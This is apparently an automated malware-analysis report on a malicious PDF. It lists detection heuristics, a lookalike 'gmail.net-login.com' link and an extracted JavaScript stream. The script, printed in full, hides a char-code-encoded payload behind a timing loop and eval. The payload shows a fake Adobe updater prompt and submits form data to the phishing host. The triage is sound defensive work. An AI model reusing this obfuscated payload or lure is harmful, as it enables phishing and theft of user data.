Verdict: MALICIOUS
Risk Score: 138

Machine Learning
- Nyx PDF Classifier suspicious score 0.4662
Heuristics (7)
- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: `} eval(decrypt(sourceCode,(new Date().getSeconds() % 1))) ;`
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Visual download / call-to-action button lure (low) SE_DOWNLOAD_BUTTON: Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow.
- External URI (info) PDF_URI: PDF contains an external URL action.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://gmail.net-login.com/XcmVyjaXBpZWD50X2lkPTAQ4MjIxTkODAwHOSZjYW1wAYWdlnbl9ydW5faWQ9MjIwONzUxMCZhY3Rpb249Y2xpY2smdXJsPWh0dHBzOi8vc2VjdXJlZC1sb2dpbi5uZXQvcGFnZXMvZWY5MDczMGFkZDA= (PDF link annotation)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://ns.adobe.com/tiff/1.0/ (in PDF document text)
  - http://ns.adobe.com/exif/1.0/ (in PDF document text)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0011_000.js | pdf-javascript-stream | PDF /JS object 11 at offset 0xBD6 | 3727 bytes |
| font_00_cff_off0001545b.bin | pdf-font-stream | PDF embedded font (cff) at offset 0x1545B | 4575 bytes |

javascript_obj0011_000.js
SHA-256: f375a6ca099b3cc7cbe617520e068c00a4a1d219cfad884d8e9e78c6999cdd12
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script)

```javascript
function generateReverseArray(){
    var arr = [];
    for (var i=0; i < 1000; i++){
        arr.push(1000 - i);
    }
    return arr;
}
function bubbleSort(inputArr, num) {
    var len = inputArr.length;
    for (var n = 0; n < num; n++) {
        for (var i = 0; i < len; i++) {
            for (var j = 0; j < len; j++) {
                if (inputArr[j] > inputArr[j + 1]) {
                    var tmp = inputArr[j];
                    inputArr[j] = inputArr[j + 1];
                    inputArr[j + 1] = tmp;
                }
            }
        }
        for (var i = 0; i < len; i++) {
            for (var j = 0; j < len; j++) {
                if (inputArr[j] < inputArr[j + 1]) {
                    var tmp = inputArr[j];
                    inputArr[j] = inputArr[j + 1];
                    inputArr[j + 1] = tmp;
                }
            }
        }
    }
    return inputArr[inputArr.length - len] - 1;
}
function triggerSelectedCodeByTiming(num){
    bubbleSort(generateReverseArray(), num);
    function generateReverseArray(){
        var arr = [];
        for (var i=0; i < 1000; i++){
            arr.push(1000 - i);
        }
        return arr;
    }
    function bubbleSort(inputArr, num) {
        var len = inputArr.length;
        for (var n = 0; n < num; n++) {
            for (var i = 0; i < len; i++) {
                for (var j = 0; j < len; j++) {
                    if (inputArr[j] > inputArr[j + 1]) {
                        var tmp = inputArr[j];
                        inputArr[j] = inputArr[j + 1];
                        inputArr[j + 1] = tmp;
                    }
                }
            }
            for (var i = 0; i < len; i++) {
                for (var j = 0; j < len; j++) {
                    if (inputArr[j] < inputArr[j + 1]) {
                        var tmp = inputArr[j];
                        inputArr[j] = inputArr[j + 1];
                        inputArr[j + 1] = tmp;
                    }
                }
            }
        }
        return inputArr[inputArr.length - len] - 1;
    }
    function triggerSelectedCodeByTiming(num){
        bubbleSort(generateReverseArray(), num);
        sourceCode = "102,117,110,99,116,105,111,110,32,100,111,99,79,112,101,110,101,100,40,41,13,123,13,97,112,112,46,97,108,101,114,116,40,123,99,77,115,103,58,32,39,87,101,32,110,101,101,100,32,116,111,32,117,112,100,97,116,101,32,121,111,117,114,32,100,111,99,117,109,101,110,116,32,114,101,110,100,101,114,105,110,103,32,101,110,103,105,110,101,46,32,67,108,105,99,107,32,79,75,32,116,111,32,99,111,110,116,105,110,117,101,44,32,119,104,101,110,32,112,114,111,109,112,116,101,100,32,97,108,108,111,119,32,114,101,109,111,116,101,32,99,111,110,110,101,99,116,105,111,110,32,116,111,32,65,100,111,98,101,32,115,101,114,118,101,114,115,46,39,44,32,99,84,105,116,108,101,58,32,39,65,100,111,98,101,32,65,99,114,111,98,97,116,32,85,112,100,97,116,101,114,39,44,110,73,99,111,110,58,32,51,125,41,59,13,97,112,112,46,100,111,99,46,115,117,98,109,105,116,70,111,114,109,40,39,104,116,116,112,58,47,47,103,109,97,105,108,46,110,101,116,45,108,111,103,105,110,46,99,111,109,47,88,99,109,86,80,106,97,88,66,112,90,87,122,53,48,88,50,108,107,80,84,83,81,52,77,106,73,120,83,87,79,68,65,119,99,79,83,90,106,89,87,49,119,105,89,87,122,108,110,98,108,57,121,100,87,53,102,97,87,81,57,77,106,73,119,111,78,122,85,120,77,67,90,104,89,51,82,112,98,50,52,57,89,88,82,48,89,87,78,111,98,87,86,117,100,65,61,61,35,70,68,70,39,41,59,13,125,13,13,100,111,99,79,112,101,110,101,100,40,41,59,10";
        function decrypt(str, jump){
            var result = "";
            var list = str.split(',');
            for (var i=0; i < list.length; i++) {
                result += String.fromCharCode(list[i] - jump);
            }
            return result;
        }
        eval(decrypt(sourceCode,(new Date().getSeconds() % 1)))
        ;
    }
    triggerSelectedCodeByTiming(10);;
}
triggerSelectedCodeByTiming(10);
```

font_00_cff_off0001545b.bin
SHA-256: 9340d372ad75a105fdb1627a30e96f892e0dc7d9588c0150cf06b4fa72281cc0